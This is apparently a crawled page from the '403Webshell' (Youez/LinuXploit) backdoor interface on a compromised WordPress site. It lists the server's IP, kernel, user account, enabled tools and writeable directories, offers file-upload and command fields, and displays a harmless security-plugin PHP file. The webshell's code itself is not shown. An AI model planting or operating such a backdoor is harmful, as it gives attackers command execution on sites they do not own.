403Webshell
Server IP : 172.67.158.161  /  Your IP : 18.217.105.174
Web Server : LiteSpeed
System : Linux business53.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : giankuin ( 1871)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/giankuin/dietcontrungnhanh.com/wp-content/plugins/ithemes-security-pro/core/integrations/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/giankuin/dietcontrungnhanh.com/wp-content/plugins/ithemes-security-pro/core/integrations/rcp.php
<?php

/**
 * Overrides the RCP IP address to use Solid Security.
 *
 * @return string
 */
function itsec_rcp_get_ip() {
	return ITSEC_Lib::get_ip();
}

add_filter( 'rcp_get_ip', 'itsec_rcp_get_ip' );

/**
 * Adds the RCP login redirect to the session.
 *
 * @param ITSEC_Login_Interstitial_Session $session
 */
function itsec_rcp_initialize_interstitial( ITSEC_Login_Interstitial_Session $session ) {
	if ( isset( $_REQUEST['rcp_redirect'] ) ) {
		$session->set_redirect_to( $_REQUEST['rcp_redirect'] );
	}
}

add_action( 'itsec_initialize_login_interstitial_session_from_global_state', 'itsec_rcp_initialize_interstitial' );

Youez - 2016 - github.com/yon3zu
LinuXploit